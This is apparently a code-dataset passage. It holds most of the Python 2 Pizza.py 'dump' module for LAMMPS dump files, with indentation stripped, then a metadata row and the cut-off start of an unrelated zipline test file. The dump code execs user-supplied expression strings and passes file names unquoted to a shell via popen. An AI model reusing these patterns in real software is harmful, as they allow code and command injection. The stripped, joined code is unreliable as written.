minmax() operates on selected timesteps and atoms
set() operates on selected timesteps and atoms
left hand side column is created if necessary
left-hand side column is unset or unchanged for non-selected atoms
equation is in Python syntax
use $ for column names, $name must end with a space
setv() operates on selected timesteps and atoms
if column label does not exist, column is created
values in vector are assigned sequentially to atoms, so may want to sort()
length of vector must match # of selected atoms
spread() operates on selected timesteps and atoms
min and max are found for 1st specified column across all selected atoms
atom's value is linear mapping (1-N) between min and max
that is stored in 2nd column (created if needed)
useful for creating a color map
clone() operates on selected timesteps and atoms
values at every timestep are set to value at timestep N for that atom ID
useful for propagating a color map
t = d.time() return vector of selected timestep values
fx,fy,... = d.atom(100,"fx","fy",...) return vector(s) for atom ID N
fx,fy,... = d.vecs(1000,"fx","fy",...) return vector(s) for timestep N
atom() returns vectors with one value for each selected timestep
vecs() returns vectors with one value for each selected atom in the timestep
index,time,flag = d.iterator(0/1) loop over dump snapshots
time,box,atoms,bonds,tris = d.viz(index) return list of viz objects
d.atype = "color" set column returned as "type" by viz
d.extra("dump.bond") read bond list from dump file
d.extra(data) extract bond/tri/line list from data
iterator() loops over selected timesteps
iterator() called with arg = 0 first time, with arg = 1 on subsequent calls
index = index within dump object (0 to # of snapshots)
time = timestep value
flag = -1 when iteration is done, 1 otherwise
viz() returns info for selected atoms for specified timestep index
time = timestep value
box = [xlo,ylo,zlo,xhi,yhi,zhi]
atoms = id,type,x,y,z for each atom as 2d array
bonds = id,type,x1,y1,z1,x2,y2,z2,t1,t2 for each bond as 2d array
if extra() was used to define bonds, else empty list
tris = id,type,x1,y1,z1,x2,y2,z2,x3,y3,z3,nx,ny,nz for each tri as 2d array
if extra() was used to define tris, else empty list
lines = id,type,x1,y1,z1,x2,y2,z2 for each line as 2d array
if extra() was used to define lines, else empty list
atype is column name viz() will return as atom type (def = "type")
extra() stores list of bonds/tris/lines to return each time viz() is called
"""
# History
# 8/05, Steve Plimpton (SNL): original version
# 12/09, David Hart (SNL): allow use of NumPy or Numeric
# ToDo list
# try to optimize this line in read_snap: words += f.readline().split()
# allow $name in aselect.test() and set() to end with non-space
# should next() snapshot be auto-unscaled ?
# Variables
# flist = list of dump file names
# increment = 1 if reading snapshots one-at-a-time
# nextfile = which file to read from via next()
# eof = ptr into current file for where to read via next()
# nsnaps = # of snapshots
# nselect = # of selected snapshots
# snaps = list of snapshots
# names = dictionary of column names:
# key = "id", value = column # (0 to M-1)
# tselect = class for time selection
# aselect = class for atom selection
# atype = name of vector used as atom type by viz extract
# bondflag = 0 if no bonds, 1 if they are defined statically
# bondlist = static list of bonds to viz() return for all snapshots
# only a list of atom pairs, coords have to be created for each snapshot
# triflag = 0 if no tris, 1 if they are defined statically, 2 if dynamic
# trilist = static list of tris to return via viz() for all snapshots
# lineflag = 0 if no lines, 1 if they are defined statically
# linelist = static list of lines to return via viz() for all snapshots
# Snap = one snapshot
# time = time stamp
# tselect = 0/1 if this snapshot selected
# natoms = # of atoms
# nselect = # of selected atoms in this snapshot
# aselect[i] = 0/1 for each atom
# xlo,xhi,ylo,yhi,zlo,zhi = box bounds (float)
# atoms[i][j] = 2d array of floats, i = 0 to natoms-1, j = 0 to ncols-1
# Imports and external programs
import sys, commands, re, glob, types
from os import popen
from math import * # any function could be used by set()
try:
import numpy as np
oldnumeric = False
except:
import Numeric as np
oldnumeric = True
try: from DEFAULTS import PIZZA_GUNZIP
except: PIZZA_GUNZIP = "gunzip"
# Class definition
class dump:
# --------------------------------------------------------------------
def __init__(self,*list):
self.snaps = []
self.nsnaps = self.nselect = 0
self.names = {}
self.tselect = tselect(self)
self.aselect = aselect(self)
self.atype = "type"
self.bondflag = 0
self.bondlist = []
self.triflag = 0
self.trilist = []
self.triobj = 0
self.lineflag = 0
self.linelist = []
# flist = list of all dump file names
words = list[0].split()
self.flist = []
for word in words: self.flist += glob.glob(word)
if len(self.flist) == 0 and len(list) == 1:
raise StandardError,"no dump file specified"
if len(list) == 1:
self.increment = 0
self.read_all()
else:
self.increment = 1
self.nextfile = 0
self.eof = 0
# --------------------------------------------------------------------
def read_all(self):
# read all snapshots from each file
# test for gzipped files
for file in self.flist:
if file[-3:] == ".gz":
f = popen("%s -c %s" % (PIZZA_GUNZIP,file),'r')
else: f = open(file)
snap = self.read_snapshot(f)
while snap:
self.snaps.append(snap)
print snap.time,
sys.stdout.flush()
snap = self.read_snapshot(f)
f.close()
print
# sort entries by timestep, cull duplicates
self.snaps.sort(self.compare_time)
self.cull()
self.nsnaps = len(self.snaps)
print "read %d snapshots" % self.nsnaps
# select all timesteps and atoms
self.tselect.all()
# set default names for atom columns if file wasn't self-describing
if len(self.snaps) == 0:
print "no column assignments made"
elif len(self.names):
print "assigned columns:",self.names2str()
elif self.snaps[0].atoms == None:
print "no column assignments made"
elif len(self.snaps[0].atoms[0]) == 5:
self.map(1,"id",2,"type",3,"x",4,"y",5,"z")
print "assigned columns:",self.names2str()
elif len(self.snaps[0].atoms[0]) == 8:
self.map(1,"id",2,"type",3,"x",4,"y",5,"z",6,"ix",7,"iy",8,"iz")
print "assigned columns:",self.names2str()
else:
print "no column assignments made"
# if snapshots are scaled, unscale them
if (not self.names.has_key("x")) or \
(not self.names.has_key("y")) or \
(not self.names.has_key("z")):
print "no unscaling could be performed"
elif self.nsnaps > 0:
if self.scaled(self.nsnaps-1): self.unscale()
else: print "dump is already unscaled"
# --------------------------------------------------------------------
# read next snapshot from list of files
def next(self):
if not self.increment: raise StandardError,"cannot read incrementally"
# read next snapshot in current file using eof as pointer
# if fail, try next file
# if new snapshot time stamp already exists, read next snapshot
while 1:
f = open(self.flist[self.nextfile],'rb')
f.seek(self.eof)
snap = self.read_snapshot(f)
if not snap:
self.nextfile += 1
if self.nextfile == len(self.flist): return -1
f.close()
self.eof = 0
continue
self.eof = f.tell()
f.close()
try:
self.findtime(snap.time)
continue
except: break
# select the new snapshot with all its atoms
self.snaps.append(snap)
snap = self.snaps[self.nsnaps]
snap.tselect = 1
snap.nselect = snap.natoms
for i in xrange(snap.natoms): snap.aselect[i] = 1
self.nsnaps += 1
self.nselect += 1
return snap.time
# --------------------------------------------------------------------
# read a single snapshot from file f
# return snapshot or 0 if failed
# assign column names if not already done and file is self-describing
# convert xs,xu to x
def read_snapshot(self,f):
try:
snap = Snap()
item = f.readline()
snap.time = int(f.readline().split()[0]) # just grab 1st field
item = f.readline()
snap.natoms = int(f.readline())
snap.aselect = np.zeros(snap.natoms)
item = f.readline()
words = f.readline().split()
snap.xlo,snap.xhi = float(words[0]),float(words[1])
words = f.readline().split()
snap.ylo,snap.yhi = float(words[0]),float(words[1])
words = f.readline().split()
snap.zlo,snap.zhi = float(words[0]),float(words[1])
item = f.readline()
if len(self.names) == 0:
words = item.split()[2:]
if len(words):
for i in range(len(words)):
if words[i] == "xs" or words[i] == "xu":
self.names["x"] = i
elif words[i] == "ys" or words[i] == "yu":
self.names["y"] = i
elif words[i] == "zs" or words[i] == "zu":
self.names["z"] = i
else: self.names[words[i]] = i
if snap.natoms:
words = f.readline().split()
ncol = len(words)
for i in xrange(1,snap.natoms):
words += f.readline().split()
floats = map(float,words)
if oldnumeric: atoms = np.zeros((snap.natoms,ncol),np.Float)
else: atoms = np.zeros((snap.natoms,ncol),np.float)
start = 0
stop = ncol
for i in xrange(snap.natoms):
atoms[i] = floats[start:stop]
start = stop
stop += ncol
else: atoms = None
snap.atoms = atoms
return snap
except:
return 0
# --------------------------------------------------------------------
# decide if snapshot i is scaled/unscaled from coords of first and last atom
def scaled(self,i):
ix = self.names["x"]
iy = self.names["y"]
iz = self.names["z"]
natoms = self.snaps[i].natoms
if natoms == 0: return 0
x1 = self.snaps[i].atoms[0][ix]
y1 = self.snaps[i].atoms[0][iy]
z1 = self.snaps[i].atoms[0][iz]
x2 = self.snaps[i].atoms[natoms-1][ix]
y2 = self.snaps[i].atoms[natoms-1][iy]
z2 = self.snaps[i].atoms[natoms-1][iz]
if x1 >= -0.1 and x1 <= 1.1 and y1 >= -0.1 and y1 <= 1.1 and \
z1 >= -0.1 and z1 <= 1.1 and x2 >= -0.1 and x2 <= 1.1 and \
y2 >= -0.1 and y2 <= 1.1 and z2 >= -0.1 and z2 <= 1.1:
return 1
else: return 0
# --------------------------------------------------------------------
# map atom column names
def map(self,*pairs):
if len(pairs) % 2 != 0:
raise StandardError, "dump map() requires pairs of mappings"
for i in range(0,len(pairs),2):
j = i + 1
self.names[pairs[j]] = pairs[i]-1
# delete unselected snapshots
# --------------------------------------------------------------------
def delete(self):
ndel = i = 0
while i < self.nsnaps:
if not self.snaps[i].tselect:
del self.snaps[i]
self.nsnaps -= 1
ndel += 1
else: i += 1
print "%d snapshots deleted" % ndel
print "%d snapshots remaining" % self.nsnaps
# --------------------------------------------------------------------
# scale coords to 0-1 for all snapshots or just one
def scale(self,*list):
if len(list) == 0:
print "Scaling dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
for snap in self.snaps: self.scale_one(snap,x,y,z)
else:
i = self.findtime(list[0])
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
self.scale_one(self.snaps[i],x,y,z)
# --------------------------------------------------------------------
def scale_one(self,snap,x,y,z):
xprdinv = 1.0 / (snap.xhi - snap.xlo)
yprdinv = 1.0 / (snap.yhi - snap.ylo)
zprdinv = 1.0 / (snap.zhi - snap.zlo)
atoms = snap.atoms
atoms[:,x] = (atoms[:,x] - snap.xlo) * xprdinv
atoms[:,y] = (atoms[:,y] - snap.ylo) * yprdinv
atoms[:,z] = (atoms[:,z] - snap.zlo) * zprdinv
# --------------------------------------------------------------------
# unscale coords from 0-1 to box size for all snapshots or just one
def unscale(self,*list):
if len(list) == 0:
print "Unscaling dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
for snap in self.snaps: self.unscale_one(snap,x,y,z)
else:
i = self.findtime(list[0])
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
self.unscale_one(self.snaps[i],x,y,z)
# --------------------------------------------------------------------
def unscale_one(self,snap,x,y,z):
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
atoms[:,x] = snap.xlo + atoms[:,x]*xprd
atoms[:,y] = snap.ylo + atoms[:,y]*yprd
atoms[:,z] = snap.zlo + atoms[:,z]*zprd
# --------------------------------------------------------------------
# wrap coords from outside box to inside
def wrap(self):
print "Wrapping dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
ix = self.names["ix"]
iy = self.names["iy"]
iz = self.names["iz"]
for snap in self.snaps:
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
atoms[:,x] -= atoms[:,ix]*xprd
atoms[:,y] -= atoms[:,iy]*yprd
atoms[:,z] -= atoms[:,iz]*zprd
# --------------------------------------------------------------------
# unwrap coords from inside box to outside
def unwrap(self):
print "Unwrapping dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
ix = self.names["ix"]
iy = self.names["iy"]
iz = self.names["iz"]
for snap in self.snaps:
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
atoms[:,x] += atoms[:,ix]*xprd
atoms[:,y] += atoms[:,iy]*yprd
atoms[:,z] += atoms[:,iz]*zprd
# --------------------------------------------------------------------
# wrap coords to same image as atom ID stored in "other" column
def owrap(self,other):
print "Wrapping to other ..."
id = self.names["id"]
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
ix = self.names["ix"]
iy = self.names["iy"]
iz = self.names["iz"]
iother = self.names[other]
for snap in self.snaps:
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
ids = {}
for i in xrange(snap.natoms):
ids[atoms[i][id]] = i
for i in xrange(snap.natoms):
j = ids[atoms[i][iother]]
atoms[i][x] += (atoms[i][ix]-atoms[j][ix])*xprd
atoms[i][y] += (atoms[i][iy]-atoms[j][iy])*yprd
atoms[i][z] += (atoms[i][iz]-atoms[j][iz])*zprd
# --------------------------------------------------------------------
# convert column names assignment to a string, in column order
def names2str(self):
ncol = len(self.snaps[0].atoms[0])
pairs = self.names.items()
values = self.names.values()
str = ""
for i in xrange(ncol):
if i in values: str += pairs[values.index(i)][0] + ' '
return str
# --------------------------------------------------------------------
# sort atoms by atom ID in all selected timesteps by default
# if arg = string, sort all steps by that column
# if arg = numeric, sort atoms in single step
def sort(self,*list):
if len(list) == 0:
print "Sorting selected snapshots ..."
id = self.names["id"]
for snap in self.snaps:
if snap.tselect: self.sort_one(snap,id)
elif type(list[0]) is types.StringType:
print "Sorting selected snapshots by %s ..." % list[0]
id = self.names[list[0]]
for snap in self.snaps:
if snap.tselect: self.sort_one(snap,id)
else:
i = self.findtime(list[0])
id = self.names["id"]
self.sort_one(self.snaps[i],id)
# --------------------------------------------------------------------
# sort a single snapshot by ID column
def sort_one(self,snap,id):
atoms = snap.atoms
ids = atoms[:,id]
ordering = np.argsort(ids)
for i in xrange(len(atoms[0])):
atoms[:,i] = np.take(atoms[:,i],ordering)
# --------------------------------------------------------------------
# write a single dump file from current selection
def write(self,file,header=1,append=0):
if len(self.snaps): namestr = self.names2str()
if not append: f = open(file,"w")
else: f = open(file,"a")
for snap in self.snaps:
if not snap.tselect: continue
print snap.time,
sys.stdout.flush()
if header:
print >>f,"ITEM: TIMESTEP"
print >>f,snap.time
print >>f,"ITEM: NUMBER OF ATOMS"
print >>f,snap.nselect
print >>f,"ITEM: BOX BOUNDS"
print >>f,snap.xlo,snap.xhi
print >>f,snap.ylo,snap.yhi
print >>f,snap.zlo,snap.zhi
print >>f,"ITEM: ATOMS",namestr
atoms = snap.atoms
nvalues = len(atoms[0])
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
line = ""
for j in xrange(nvalues):
if (j < 2):
line += str(int(atoms[i][j])) + " "
else:
line += str(atoms[i][j]) + " "
print >>f,line
f.close()
print "\n%d snapshots" % self.nselect
# --------------------------------------------------------------------
# write one dump file per snapshot from current selection
def scatter(self,root):
if len(self.snaps): namestr = self.names2str()
for snap in self.snaps:
if not snap.tselect: continue
print snap.time,
sys.stdout.flush()
file = root + "." + str(snap.time)
f = open(file,"w")
print >>f,"ITEM: TIMESTEP"
print >>f,snap.time
print >>f,"ITEM: NUMBER OF ATOMS"
print >>f,snap.nselect
print >>f,"ITEM: BOX BOUNDS"
print >>f,snap.xlo,snap.xhi
print >>f,snap.ylo,snap.yhi
print >>f,snap.zlo,snap.zhi
print >>f,"ITEM: ATOMS",namestr
atoms = snap.atoms
nvalues = len(atoms[0])
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
line = ""
for j in xrange(nvalues):
if (j < 2):
line += str(int(atoms[i][j])) + " "
else:
line += str(atoms[i][j]) + " "
print >>f,line
f.close()
print "\n%d snapshots" % self.nselect
# --------------------------------------------------------------------
# find min/max across all selected snapshots/atoms for a particular column
def minmax(self,colname):
icol = self.names[colname]
min = 1.0e20
max = -min
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
if atoms[i][icol] < min: min = atoms[i][icol]
if atoms[i][icol] > max: max = atoms[i][icol]
return (min,max)
# --------------------------------------------------------------------
# set a column value via an equation for all selected snapshots
def set(self,eq):
print "Setting ..."
pattern = "\$\w*"
list = re.findall(pattern,eq)
lhs = list[0][1:]
if not self.names.has_key(lhs):
self.newcolumn(lhs)
for item in list:
name = item[1:]
column = self.names[name]
insert = "snap.atoms[i][%d]" % (column)
eq = eq.replace(item,insert)
ceq = compile(eq,'','single')
for snap in self.snaps:
if not snap.tselect: continue
for i in xrange(snap.natoms):
if snap.aselect[i]: exec ceq
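# For example (illustrative): with the usual column mapping, the equation
# "$ke = $vx * $vx + $vy * $vy" is rewritten above to something like
# "snap.atoms[i][K] = snap.atoms[i][VX] * snap.atoms[i][VX] + snap.atoms[i][VY] * snap.atoms[i][VY]"
# (K, VX, VY being the resolved column indices) and exec'd once per selected atom
# in every selected snapshot.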
# --------------------------------------------------------------------
# set a column value via an input vec for all selected snapshots/atoms
def setv(self,colname,vec):
print "Setting ..."
if not self.names.has_key(colname):
self.newcolumn(colname)
icol = self.names[colname]
for snap in self.snaps:
if not snap.tselect: continue
if snap.nselect != len(vec):
raise StandardError,"vec length does not match # of selected atoms"
atoms = snap.atoms
m = 0
for i in xrange(snap.natoms):
if snap.aselect[i]:
atoms[i][icol] = vec[m]
m += 1
# --------------------------------------------------------------------
# clone value in col across selected timesteps for atoms with same ID
def clone(self,nstep,col):
istep = self.findtime(nstep)
icol = self.names[col]
id = self.names["id"]
ids = {}
for i in xrange(self.snaps[istep].natoms):
ids[self.snaps[istep].atoms[i][id]] = i
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
j = ids[atoms[i][id]]
atoms[i][icol] = self.snaps[istep].atoms[j][icol]
# --------------------------------------------------------------------
# values in old column are spread as ints from 1-N and assigned to new column
def spread(self,old,n,new):
iold = self.names[old]
if not self.names.has_key(new): self.newcolumn(new)
inew = self.names[new]
min,max = self.minmax(old)
print "min/max = ",min,max
gap = max - min
invdelta = n/gap
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
ivalue = int((atoms[i][iold] - min) * invdelta) + 1
if ivalue > n: ivalue = n
if ivalue < 1: ivalue = 1
atoms[i][inew] = ivalue
# --------------------------------------------------------------------
# return vector of selected snapshot time stamps
def time(self):
vec = self.nselect * [0]
i = 0
for snap in self.snaps:
if not snap.tselect: continue
vec[i] = snap.time
i += 1
return vec
# --------------------------------------------------------------------
# extract vector(s) of values for atom ID n at each selected timestep
def atom(self,n,*list):
if len(list) == 0:
raise StandardError, "no columns specified"
columns = []
values = []
for name in list:
columns.append(self.names[name])
values.append(self.nselect * [0])
ncol = len(columns)
id = self.names["id"]
m = 0
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if atoms[i][id] == n: break
if atoms[i][id] != n:
raise StandardError, "could not find atom ID in snapshot"
for j in xrange(ncol):
values[j][m] = atoms[i][columns[j]]
m += 1
if len(list) == 1: return values[0]
else: return values
# --------------------------------------------------------------------
# extract vector(s) of values for selected atoms at chosen timestep
def vecs(self,n,*list):
snap = self.snaps[self.findtime(n)]
if len(list) == 0:
raise StandardError, "no columns specified"
columns = []
values = []
for name in list:
columns.append(self.names[name])
values.append(snap.nselect * [0])
ncol = len(columns)
m = 0
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
for j in xrange(ncol):
values[j][m] = snap.atoms[i][columns[j]]
m += 1
if len(list) == 1: return values[0]
else: return values
# --------------------------------------------------------------------
# add a new column to every snapshot and set value to 0
# set the name of the column to str
def newcolumn(self,str):
ncol = len(self.snaps[0].atoms[0])
self.map(ncol+1,str)
for snap in self.snaps:
atoms = snap.atoms
if oldnumeric: newatoms = np.zeros((snap.natoms,ncol+1),np.Float)
else: newatoms = np.zeros((snap.natoms,ncol+1),np.float)
newatoms[:,0:ncol] = snap.atoms
snap.atoms = newatoms
# --------------------------------------------------------------------
# sort snapshots on time stamp
def compare_time(self,a,b):
if a.time < b.time:
return -1
elif a.time > b.time:
return 1
else:
return 0
# --------------------------------------------------------------------
# delete successive snapshots with duplicate time stamp
def cull(self):
i = 1
while i < len(self.snaps):
if self.snaps[i].time == self.snaps[i-1].time:
del self.snaps[i]
else:
i += 1
# --------------------------------------------------------------------
# iterate over selected snapshots
def iterator(self,flag):
start = 0
if flag: start = self.iterate + 1
for i in xrange(start,self.nsnaps):
if self.snaps[i].tselect:
self.iterate = i
return i,self.snaps[i].time,1
return 0,0,-1
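# Typical driver loop over selected snapshots (illustrative sketch):
#   flag = 0
#   while 1:
#       index, time, flag = d.iterator(flag)
#       if flag == -1: break
#       # process snapshot "index", e.g. via d.viz(index)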
# --------------------------------------------------------------------
# return list of atoms to viz for snapshot isnap
# augment with bonds, tris, lines if extra() was invoked
def viz(self,isnap):
snap = self.snaps[isnap]
time = snap.time
box = [snap.xlo,snap.ylo,snap.zlo,snap.xhi,snap.yhi,snap.zhi]
id = self.names["id"]
type = self.names[self.atype]
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
# create atom list needed by viz from id,type,x,y,z
# need Numeric/Numpy mode here
atoms = []
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
atom = snap.atoms[i]
atoms.append([atom[id],atom[type],atom[x],atom[y],atom[z]])
# create list of current bond coords from static bondlist
# alist = dictionary of atom IDs for atoms list
# lookup bond atom IDs in alist and grab their coords
# try is used since some atoms may be unselected
# any bond with unselected atom is not returned to viz caller
# need Numeric/Numpy mode here
bonds = []
if self.bondflag:
alist = {}
for i in xrange(len(atoms)): alist[int(atoms[i][0])] = i
for bond in self.bondlist:
try:
i = alist[bond[2]]
j = alist[bond[3]]
atom1 = atoms[i]
atom2 = atoms[j]
bonds.append([bond[0],bond[1],atom1[2],atom1[3],atom1[4],
atom2[2],atom2[3],atom2[4],atom1[1],atom2[1]])
except: continue
tris = []
if self.triflag:
if self.triflag == 1: tris = self.trilist
elif self.triflag == 2:
timetmp,boxtmp,atomstmp,bondstmp, \
tris,linestmp = self.triobj.viz(time,1)
lines = []
if self.lineflag: lines = self.linelist
return time,box,atoms,bonds,tris,lines
# --------------------------------------------------------------------
def findtime(self,n):
for i in xrange(self.nsnaps):
if self.snaps[i].time == n: return i
raise StandardError, "no step %d exists" % n
# --------------------------------------------------------------------
# return maximum box size across all selected snapshots
def maxbox(self):
xlo = ylo = zlo = None
xhi = yhi = zhi = None
for snap in self.snaps:
if not snap.tselect: continue
if xlo == None or snap.xlo < xlo: xlo = snap.xlo
if xhi == None or snap.xhi > xhi: xhi = snap.xhi
if ylo == None or snap.ylo < ylo: ylo = snap.ylo
if yhi == None or snap.yhi > yhi: yhi = snap.yhi
if zlo == None or snap.zlo < zlo: zlo = snap.zlo
if zhi == None or snap.zhi > zhi: zhi = snap.zhi
return [xlo,ylo,zlo,xhi,yhi,zhi]
# --------------------------------------------------------------------
# return maximum atom type across all selected snapshots and atoms
def maxtype(self):
icol = self.names["type"]
max = 0
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
if atoms[i][icol] > max: max = atoms[i][icol]
return int(max)
# --------------------------------------------------------------------
# grab bonds/tris/lines from another object
def extra(self,arg):
# read bonds from bond dump file
if type(arg) is types.StringType:
try:
f = open(arg,'r')
item = f.readline()
time = int(f.readline())
item = f.readline()
nbonds = int(f.readline())
item = f.readline()
if not re.search("BONDS",item):
raise StandardError, "could not read bonds from dump file"
words = f.readline().split()
ncol = len(words)
for i in xrange(1,nbonds):
words += f.readline().split()
f.close()
        # convert values to int and take absolute value since bond types can be negative
if oldnumeric: bondlist = np.zeros((nbonds,4),np.Int)
else: bondlist = np.zeros((nbonds,4),np.int)
ints = [abs(int(value)) for value in words]
start = 0
stop = 4
for i in xrange(nbonds):
bondlist[i] = ints[start:stop]
start += ncol
stop += ncol
        # use len() since truth-testing a multi-element array is ambiguous
        if len(bondlist):
self.bondflag = 1
self.bondlist = bondlist
except:
raise StandardError,"could not read from bond dump file"
# request bonds from data object
elif type(arg) is types.InstanceType and ".data" in str(arg.__class__):
try:
bondlist = []
bondlines = arg.sections["Bonds"]
for line in bondlines:
words = line.split()
bondlist.append([int(words[0]),int(words[1]),
int(words[2]),int(words[3])])
if bondlist:
self.bondflag = 1
self.bondlist = bondlist
except:
raise StandardError,"could not extract bonds from data object"
# request tris/lines from cdata object
elif type(arg) is types.InstanceType and ".cdata" in str(arg.__class__):
try:
tmp,tmp,tmp,tmp,tris,lines = arg.viz(0)
if tris:
self.triflag = 1
self.trilist = tris
if lines:
self.lineflag = 1
self.linelist = lines
except:
raise StandardError,"could not extract tris/lines from cdata object"
# request tris from mdump object
elif type(arg) is types.InstanceType and ".mdump" in str(arg.__class__):
try:
self.triflag = 2
self.triobj = arg
except:
raise StandardError,"could not extract tris from mdump object"
else:
raise StandardError,"unrecognized argument to dump.extra()"
# --------------------------------------------------------------------
def compare_atom(self,a,b):
if a[0] < b[0]:
return -1
elif a[0] > b[0]:
return 1
else:
return 0
# --------------------------------------------------------------------
# one snapshot
class Snap:
pass
# --------------------------------------------------------------------
# time selection class
class tselect:
def __init__(self,data):
self.data = data
# --------------------------------------------------------------------
def all(self):
data = self.data
for snap in data.snaps:
snap.tselect = 1
data.nselect = len(data.snaps)
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def one(self,n):
data = self.data
for snap in data.snaps:
snap.tselect = 0
i = data.findtime(n)
data.snaps[i].tselect = 1
data.nselect = 1
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def none(self):
data = self.data
for snap in data.snaps:
snap.tselect = 0
data.nselect = 0
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def skip(self,n):
data = self.data
count = n-1
for snap in data.snaps:
if not snap.tselect: continue
count += 1
if count == n:
count = 0
continue
snap.tselect = 0
data.nselect -= 1
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def test(self,teststr):
data = self.data
snaps = data.snaps
cmd = "flag = " + teststr.replace("$t","snaps[i].time")
ccmd = compile(cmd,'','single')
for i in xrange(data.nsnaps):
if not snaps[i].tselect: continue
exec ccmd
if not flag:
snaps[i].tselect = 0
data.nselect -= 1
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
# atom selection class
class aselect:
def __init__(self,data):
self.data = data
# --------------------------------------------------------------------
def all(self,*args):
data = self.data
if len(args) == 0: # all selected timesteps
for snap in data.snaps:
if not snap.tselect: continue
for i in xrange(snap.natoms): snap.aselect[i] = 1
snap.nselect = snap.natoms
else: # one timestep
n = data.findtime(args[0])
snap = data.snaps[n]
for i in xrange(snap.natoms): snap.aselect[i] = 1
snap.nselect = snap.natoms
# --------------------------------------------------------------------
def test(self,teststr,*args):
data = self.data
# replace all $var with snap.atoms references and compile test string
pattern = "\$\w*"
list = re.findall(pattern,teststr)
for item in list:
name = item[1:]
column = data.names[name]
insert = "snap.atoms[i][%d]" % column
teststr = teststr.replace(item,insert)
cmd = "flag = " + teststr
ccmd = compile(cmd,'','single')
if len(args) == 0: # all selected timesteps
for snap in data.snaps:
if not snap.tselect: continue
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
exec ccmd
if not flag:
snap.aselect[i] = 0
snap.nselect -= 1
for i in xrange(data.nsnaps):
if data.snaps[i].tselect:
print "%d atoms of %d selected in first step %d" % \
(data.snaps[i].nselect,data.snaps[i].natoms,data.snaps[i].time)
break
for i in xrange(data.nsnaps-1,-1,-1):
if data.snaps[i].tselect:
print "%d atoms of %d selected in last step %d" % \
(data.snaps[i].nselect,data.snaps[i].natoms,data.snaps[i].time)
break
else: # one timestep
n = data.findtime(args[0])
snap = data.snaps[n]
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
exec ccmd
if not flag:
snap.aselect[i] = 0
snap.nselect -= 1
| gpl-2.0 | 3,068,057,503,537,038,300 | 31.797396 | 79 | 0.548253 | false |
quantopian/zipline | tests/test_api_shim.py | 1 | 19024 | import warnings
from mock import patch
import numpy as np
import pandas as pd
from pandas.core.common import PerformanceWarning
from zipline.finance.trading import SimulationParameters
from zipline.testing import (
MockDailyBarReader,
create_daily_df_for_asset,
create_minute_df_for_asset,
str_to_seconds,
)
from zipline.testing.fixtures import (
WithCreateBarData,
WithMakeAlgo,
ZiplineTestCase,
)
from zipline.zipline_warnings import ZiplineDeprecationWarning
simple_algo = """
from zipline.api import sid, order
def initialize(context):
pass
def handle_data(context, data):
assert sid(1) in data
assert sid(2) in data
assert len(data) == 3
for asset in data:
pass
"""
history_algo = """
from zipline.api import sid, history
def initialize(context):
context.sid1 = sid(1)
def handle_data(context, data):
context.history_window = history(5, "1m", "volume")
"""
history_bts_algo = """
from zipline.api import sid, history, record
def initialize(context):
context.sid3 = sid(3)
context.num_bts = 0
def before_trading_start(context, data):
context.num_bts += 1
# Get history at the second BTS (beginning of second day)
if context.num_bts == 2:
record(history=history(5, "1m", "volume"))
def handle_data(context, data):
pass
"""
simple_transforms_algo = """
from zipline.api import sid
def initialize(context):
context.count = 0
def handle_data(context, data):
if context.count == 2:
context.mavg = data[sid(1)].mavg(5)
context.vwap = data[sid(1)].vwap(5)
context.stddev = data[sid(1)].stddev(5)
context.returns = data[sid(1)].returns()
context.count += 1
"""
manipulation_algo = """
def initialize(context):
context.asset1 = sid(1)
context.asset2 = sid(2)
def handle_data(context, data):
assert len(data) == 2
assert len(data.keys()) == 2
assert context.asset1 in data.keys()
assert context.asset2 in data.keys()
"""
sid_accessor_algo = """
from zipline.api import sid
def initialize(context):
context.asset1 = sid(1)
def handle_data(context,data):
assert data[sid(1)].sid == context.asset1
assert data[sid(1)]["sid"] == context.asset1
"""
data_items_algo = """
from zipline.api import sid
def initialize(context):
context.asset1 = sid(1)
context.asset2 = sid(2)
def handle_data(context, data):
iter_list = list(data.iteritems())
items_list = data.items()
assert iter_list == items_list
"""
reference_missing_position_by_int_algo = """
def initialize(context):
pass
def handle_data(context, data):
context.portfolio.positions[24]
"""
reference_missing_position_by_unexpected_type_algo = """
def initialize(context):
pass
def handle_data(context, data):
context.portfolio.positions["foobar"]
"""
class TestAPIShim(WithCreateBarData,
WithMakeAlgo,
